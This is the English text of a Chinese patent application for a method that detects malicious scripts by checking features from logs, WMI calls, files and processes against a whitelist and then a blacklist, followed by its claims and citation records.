The detection device provided by the application first obtains script features of a script under a target detection dimension, where the target detection dimension includes at least one of a log generated during script execution, a WMI system plug-in called during script execution, the file of the script and the process of the script; it then obtains a detection standard corresponding to the script features and detects the script features according to the detection standard to generate a detection result. Because the log generated during script execution, the WMI system plug-in called during script execution, the script file and the script process can each yield features that represent the identity of the script, whether the script is malicious can be detected and judged from the features of any one of these dimensions (log, WMI system plug-in, file and process), scripts that may tamper with the server's data can be screened out, and the stability of service operation in the server is better ensured.
On the basis of the foregoing embodiments, the embodiments of the present application further describe and optimize the detection device. Specifically, the method comprises the following steps:
in one embodiment, the script features include one or more of instructions for execution of the script, strings in the script, and paths of the script.
In one embodiment, when the target detection dimension is a log generated during script execution, the feature reading module 10 includes:
and the log characteristic acquisition module is used for reading the log file under the log path corresponding to the script and acquiring the script characteristics in the log file.
In one embodiment, when the target detection dimension is a WMI system plug-in invoked during script execution, the feature reading module 10 includes:
and the WMI characteristic reading module is used for acquiring the WMI class corresponding to the WMI system plug-in called in the script execution process and reading the script characteristics in the parameters of the WMI class.
In one embodiment, when the target detection dimension is a file of a script, the feature reading module 10 includes:
and the file characteristic reading module is used for acquiring related files triggered when the script is executed and acquiring script characteristics according to the related files.
In one embodiment, when the target detection dimension is a process of a script, the feature reading module 10 includes:
and the process characteristic reading module is used for acquiring a related process started when the script is executed and acquiring the script characteristics according to the related process.
In one embodiment, the detection criterion acquiring module 11 includes:
the black and white list acquisition module is used for acquiring a feature white list and a feature black list corresponding to the script features;
a detection module 12 comprising:
the white list judging module is used for judging whether the script features are matched with the feature white list;
the normal feature module is used for setting the script features as normal features if the script features are matched with the feature white list;
the blacklist judging module is used for judging whether the script features are matched with the feature blacklist or not if the script features are not matched with the feature whitelist;
and the abnormal characteristic module is used for setting the script characteristics as abnormal characteristics if the script characteristics are matched with the characteristic blacklist.
And the user prompting module is used for prompting the script characteristics to the user if the script characteristics are not matched with the characteristic blacklist.
In addition, this embodiment also discloses an electronic device, including:
a memory for storing a computer program;
a processor for implementing the steps of the detection method as described above when executing the computer program.
The electronic device provided by the application first obtains script features of a script under a target detection dimension, where the target detection dimension includes at least one of a log generated during script execution, a WMI system plug-in called during script execution, the file of the script and the process of the script; it then obtains a detection standard corresponding to the script features and detects the script features according to the detection standard to generate a detection result. Because the log generated during script execution, the WMI system plug-in called during script execution, the script file and the script process can each yield features that represent the identity of the script, whether the script is malicious can be detected and judged from the features of any one of these dimensions (log, WMI system plug-in, file and process), scripts that may tamper with the server's data can be screened out, and the stability of service operation in the server is better ensured.
Further, the present application also provides a computer-readable storage medium on which a computer program is stored; when executed by a processor, the computer program implements the steps of the detection method described above. For the specific steps of the method, reference may be made to the corresponding contents disclosed in the foregoing embodiments, which are not repeated here.
The computer-readable storage medium provided by the application first obtains script features of a script under a target detection dimension, where the target detection dimension includes at least one of a log generated during script execution, a WMI system plug-in called during script execution, the file of the script and the process of the script; it then obtains a detection standard corresponding to the script features and detects the script features according to the detection standard to generate a detection result. Because the log generated during script execution, the WMI system plug-in called during script execution, the script file and the script process can each yield features that represent the identity of the script, whether the script is malicious can be detected and judged from the features of any one of these dimensions (log, WMI system plug-in, file and process), scripts that may tamper with the server's data can be screened out, and the stability of service operation in the server is better ensured.
The above description provides a detection apparatus, a device and a storage medium. The embodiments in this specification are described in a progressive manner; each embodiment focuses on its differences from the others, and for the same or similar parts the embodiments can be referred to one another. Since the device disclosed in the embodiments corresponds to the method disclosed in the embodiments, its description is brief, and the relevant points can be found in the description of the method. It should be noted that those skilled in the art can make several improvements and modifications to the present application without departing from its principle, and such improvements and modifications also fall within the scope of the claims of the present application.
It is further noted that, in the present specification, relational terms such as first and second, and the like are used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Also, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other identical elements in a process, method, article, or apparatus that comprises the element.

Claims (10)

1. A method of detection, comprising:
acquiring script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script;
acquiring a detection standard corresponding to the script feature;
and detecting the script characteristics according to the detection standard to generate a detection result.
2. The detection method according to claim 1, wherein the script features include one or more of instructions executed by the script, character strings in the script, and paths of the script.
3. The method according to claim 2, wherein when the target detection dimension is a log generated during the script execution process, the obtaining of the script feature of the script in the target detection dimension includes:
and reading a log file under a log path corresponding to the script, and acquiring the script characteristics in the log file.
4. The detection method according to claim 2, wherein when the target detection dimension is a WMI system plug-in invoked during the script execution process, the obtaining of the script characteristics of the script in the target detection dimension includes:
and acquiring a WMI class corresponding to the WMI system plug-in called in the script execution process, and reading the script characteristics in the parameters of the WMI class.
5. The method according to claim 2, wherein when the target detection dimension is a file of the script, the obtaining script features of the script in the target detection dimension includes:
and acquiring a related file triggered when the script is executed, and acquiring the script characteristics according to the related file.
6. The method according to claim 2, wherein when the target detection dimension is a process of the script, the obtaining script features of the script in the target detection dimension includes:
and acquiring a related process started when the script is executed, and acquiring the script characteristics according to the related process.
7. The method according to any one of claims 1 to 6, wherein the detection criteria include a feature white list and a feature black list;
the detecting the script features according to the detection standard to generate a detection result includes:
judging whether the script features are matched with the feature white list or not;
if the script features are matched with the feature white list, setting the script features as normal features;
if the script features are not matched with the feature white list, judging whether the script features are matched with the feature black list;
setting the script features as abnormal features if the script features are matched with the feature blacklist;
and if the script features are not matched with the feature blacklist, prompting the script features to a user for the user to judge the script features.
8. A detection device, comprising:
the characteristic reading module is used for acquiring script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script;
the detection standard acquisition module is used for acquiring a detection standard corresponding to the script characteristics;
and the detection module is used for detecting the script characteristics according to the detection standard to generate a detection result.
9. An electronic device, comprising:
a memory for storing a computer program;
a processor for implementing the steps of the detection method according to any one of claims 1 to 7 when executing the computer program.
10. A computer-readable storage medium, characterized in that a computer program is stored on the computer-readable storage medium, which computer program, when being executed by a processor, carries out the steps of the detection method according to any one of claims 1 to 7.
CN201911067297.2A 2019-11-04 2019-11-04 Detection method, device, equipment and storage medium Pending CN110806980A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201911067297.2A CN110806980A (en) 2019-11-04 2019-11-04 Detection method, device, equipment and storage medium


Publications (1)

Publication Number Publication Date
CN110806980A true CN110806980A (en) 2020-02-18


Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN114021125A (en) * 2021-11-10 2022-02-08 安天科技集团股份有限公司 Terminal equipment abnormity detection method and device, computing equipment and storage medium
CN114466074A (en) * 2021-12-10 2022-05-10 奇安信科技集团股份有限公司 Attack behavior detection method and device based on WMI

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20080320498A1 (en) * 2007-06-23 2008-12-25 Microsoft Corporation High Performance Script Behavior Detection Through Browser Shimming
CN103221960A (en) * 2012-12-10 2013-07-24 华为技术有限公司 Detection method and apparatus of malicious code
US20160171216A1 (en) * 2014-12-12 2016-06-16 International Business Machines Corporation Normalizing and detecting inserted malicious code
CN108459962A (en) * 2018-01-23 2018-08-28 平安普惠企业管理有限公司 Code specification detection method, device, terminal device and storage medium



Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination